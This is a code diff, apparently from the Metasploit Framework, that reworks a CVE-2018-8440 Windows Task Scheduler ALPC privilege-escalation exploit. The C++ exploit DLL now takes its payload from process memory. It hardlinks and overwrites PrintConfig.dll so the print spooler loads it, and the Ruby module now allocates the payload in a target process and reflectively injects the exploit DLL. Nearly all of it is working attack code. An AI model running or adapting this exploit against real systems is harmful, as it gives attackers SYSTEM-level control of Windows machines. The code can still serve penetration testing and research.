Inject Payload to Memory First

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp

@@ -77,7 +77,7 @@ void RunExploit()
 	_SchRpcSetSecurity(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0);
 }
 
-int mainf()
+int mainf(LPVOID lpReserved)
 {
 	//We enumerate the path of PrintConfig.dll, which we will write the DACL of and overwrite to hijack the print spooler service
 	//You might want to expand this code block with FindNextFile .. as there may be multiple prnms003.inf_amd64* folders since older versions do not get cleaned up it in some rare cases.
@@ -112,37 +112,21 @@ int mainf()
 	CreateNativeHardlink(jobPath, prntCnfg);
 	RunExploit();
 
-	HANDLE hPayload = ::CreateFile(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-	if (hPayload == INVALID_HANDLE_VALUE) {
-		return(-1);
-	}
-
-	DWORD payloadSize = ::GetFileSize(hPayload, NULL);
-
-	VOID* payloadBuffer = malloc(payloadSize);
-	if (payloadBuffer == NULL) {
-		return(-1);
-	}
-
-	DWORD bytesRead;
-	::ReadFile(hPayload, payloadBuffer, payloadSize, &bytesRead, NULL);
-	if (payloadSize != bytesRead) {
-		return(-1);
-	}
+	MEMORY_BASIC_INFORMATION lpBuffer;
+	VirtualQuery(lpReserved, &lpBuffer, sizeof(MEMORY_BASIC_INFORMATION));
 
 	//We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue
 	HANDLE hFile;
 	DWORD dwBytesWritten = 0;
 	do {
 		hFile = CreateFile(prntCnfg, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-		WriteFile(hFile, (char*)payloadBuffer, bytesRead, &dwBytesWritten, NULL);
+		WriteFile(hFile, (char*)lpBuffer.AllocationBase, (DWORD)lpBuffer.RegionSize, &dwBytesWritten, NULL);
 		if (hFile == INVALID_HANDLE_VALUE)
 		{
 			Sleep(5000);
 		}
 	} while (hFile == INVALID_HANDLE_VALUE);
 	CloseHandle(hFile);
-	CloseHandle(hPayload);
 
 	//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.
 	CoInitialize(nullptr);
@@ -159,9 +143,9 @@ int mainf()
 	return 0;
 }
 
-DWORD CALLBACK ExploitThread(LPVOID hModule)
+DWORD CALLBACK ExploitThread(LPVOID lpReserved)
 {
-	mainf();
-	FreeLibraryAndExitThread((HMODULE)hModule, 0);
+	mainf(lpReserved);
+	FreeLibraryAndExitThread(GetModuleHandle(NULL), 0);
 	return 0;
 }

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp

@@ -11,7 +11,7 @@ BOOL APIENTRY DllMain(HMODULE hModule,
 	switch (ul_reason_for_call)
 	{
 	case DLL_PROCESS_ATTACH:
-		CreateThread(NULL, 0, ExploitThread, hModule, 0, NULL);
+		CreateThread(NULL, 0, ExploitThread, lpReserved, 0, NULL);
 		break;
 	case DLL_THREAD_ATTACH:
 	case DLL_THREAD_DETACH:

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c

@@ -4,7 +4,7 @@
 
 
  /* File created by MIDL compiler version 8.00.0603 */
-/* at Wed Sep 19 07:57:18 2018
+/* at Wed Sep 19 20:58:45 2018
  */
 /* Compiler settings for rpc.idl:
     Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h

@@ -4,7 +4,7 @@
 
 
  /* File created by MIDL compiler version 8.00.0603 */
-/* at Wed Sep 19 07:57:18 2018
+/* at Wed Sep 19 20:58:45 2018
  */
 /* Compiler settings for rpc.idl:
     Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c

@@ -4,7 +4,7 @@
 
 
  /* File created by MIDL compiler version 8.00.0603 */
-/* at Wed Sep 19 07:57:18 2018
+/* at Wed Sep 19 20:58:45 2018
  */
 /* Compiler settings for rpc.idl:
     Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 

modules/exploits/windows/local/alpc_taskscheduler.rb

@@ -95,38 +95,23 @@ class MetasploitModule < Msf::Exploit::Local
     @process_name = datastore['PROCESS'] || 'notepad.exe'
   end
 
-  def overwrite_payload_path(exploit_data)
-    # The payload path is hard-coded into the exploit
-    # We need to change it, but the exploit binary is in UTF-16LE
-    # But our parsers (right now) expect it to be encoded as ANSI-8bit
-    # Covert the exploit binary to UTF-16, switch the values, then return
-    # the encoding to whatever it was to begin with
-    print_status("Attempting to change the payload path to #{payload_path}...")
-
-    if payload_path.length > original_path.length
-      fail_with(Failure::BadConfig,"Parameter PAYLOAD_NAME may not exceed #{original_path.length} characters, including extension")
-    end
-
-    original_encoding = exploit_data.encoding
-    padded_path = payload_path + ("\x00" * (original_path.length-payload_path.length))
-
-    padded_path.encode!("UTF-16LE")
-    original_path.encode!("UTF-16LE")
-    exploit_data.force_encoding("UTF-16LE")
-
-    exploit_data.sub!(original_path, padded_path)
-    exploit_data.force_encoding(original_encoding)
-  end
-
   def inject_magic(process)
     library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
     library_path = ::File.expand_path(library_path)
     dll_data = ''
     ::File.open(library_path, 'rb') { |f| dll_data = f.read }
-    overwrite_payload_path(dll_data)
+
+    print_status("Writing payload dll into process #{process.pid} memory")
+    payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
+    written = process.memory.write(payload_addr, payload_dll)
+
+    if written != payload_dll.length
+      fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
+    end
+
     print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
     exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
-    process.thread.create(exploit_mem + offset)
+    process.thread.create(exploit_mem + offset, payload_addr)
   end
 
   def validate_active_host